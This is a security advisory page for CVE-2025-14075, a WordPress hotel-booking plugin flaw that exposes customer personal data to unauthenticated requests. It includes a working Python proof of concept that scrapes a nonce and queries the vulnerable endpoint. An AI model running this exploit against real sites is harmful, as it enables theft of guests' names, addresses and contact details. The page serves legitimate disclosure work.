Security Vulnerability Report
中文
CVE-2025-14075 CVSS 5.3 MEDIUM

CVE-2025-14075

Published: 2026-01-17 03:16:03
Last Modified: 2026-04-15 00:35:42

Description

The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Hotel Booking < 2.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Step 1: Fetch the public nonce from the page homepage = requests.get("http://target-wordpress-site.com/") nonce_match = re.search(r'nonce":"([a-zA-Z0-9]+)"', homepage.text) if not nonce_match: # Try alternative nonce patterns nonce_match = re.search(r'var\s+\w+\s*=\s*{"nonce":"([a-zA-Z0-9]+)"', homepage.text) if nonce_match: nonce = nonce_match.group(1) print(f"[+] Found nonce: {nonce}") # Step 2: Exploit the vulnerable AJAX endpoint target_email = "[email protected]" exploit_data = { "action": "hotel_booking_fetch_customer_info", "nonce": nonce, "email": target_email } response = requests.post(target_url, data=exploit_data) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Content: {response.text}") else: print("[-] Failed to find nonce")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14075", "sourceIdentifier": "[email protected]", "published": "2026-01-17T03:16:03.200", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce."}, {"lang": "es", "value": "El plugin WP Hotel Booking para WordPress es vulnerable a la exposición de información sensible en todas las versiones hasta la 2.2.7, inclusive. Esto se debe a que el plugin expone la acción AJAX 'hotel_booking_fetch_customer_info' a usuarios no autenticados sin las comprobaciones de capacidad adecuadas, basándose únicamente en un nonce para su protección. Esto permite que atacantes no autenticados recuperen información sensible del cliente, incluyendo nombres completos, direcciones, números de teléfono y direcciones de correo electrónico, al proporcionar una dirección de correo electrónico válida y un nonce accesible públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L192", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-hotel-booking/tags/2.2.7/includes/class-wphb-ajax.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-hotel-booking/trunk/includes/class-wphb-ajax.php#L192", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429399%40wp-hotel-booking&new=3429399%40wp-hotel-booking&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1fc4eaec-b5d8-4707-9260-bac02a4b1866?source=cve", "source": "[email protected]"}]}}